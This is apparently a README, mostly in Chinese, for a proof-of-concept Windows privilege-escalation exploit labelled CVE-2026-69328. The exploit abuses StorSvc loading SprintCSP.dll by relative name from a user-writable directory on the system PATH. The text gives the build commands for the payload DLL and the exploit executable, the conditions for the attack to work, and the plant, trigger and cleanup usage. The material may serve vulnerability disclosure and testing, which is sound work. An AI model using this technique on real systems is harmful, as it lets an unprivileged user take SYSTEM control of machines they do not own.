StorSvc 以 SYSTEM 权限按相对名称加载 SprintCSP.dll。将其放入用户可写的 HKLM PATH 目录中,即可获取 SYSTEM 权限。
需要在 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path 中存在一个用户可写目录。
干净镜像上不存在此类目录。工具安装程序会添加它们(%USERPROFILE%\.cargo\bin、.local\bin、Python Scripts)。如果目标机器上没有,CVE-2026-69328.exe --setup 会创建一个,这需要一次性的管理员提示。漏洞利用本身从不需要管理员权限。
GCC:
gcc payload.c -shared -o SprintCSP.dll
gcc CVE-2026-69328.c -lrpcrt4 -ladvapi32 -lshell32 -o CVE-2026-69328.exe
MSVC:
cl /LD payload.c /Fe:SprintCSP.dll
cl CVE-2026-69328.c rpcrt4.lib advapi32.lib shell32.lib /Fe:CVE-2026-69328.exe
CVE-2026-69328.exe plant, trigger, read proof
CVE-2026-69328.exe --cleanup remove proof file + planted DLL
证明文件位于 C:\Windows\System32\CVE-2026-69328.txt。
StorSvc 在加载后崩溃,SCM 会在约 120 秒后重启它。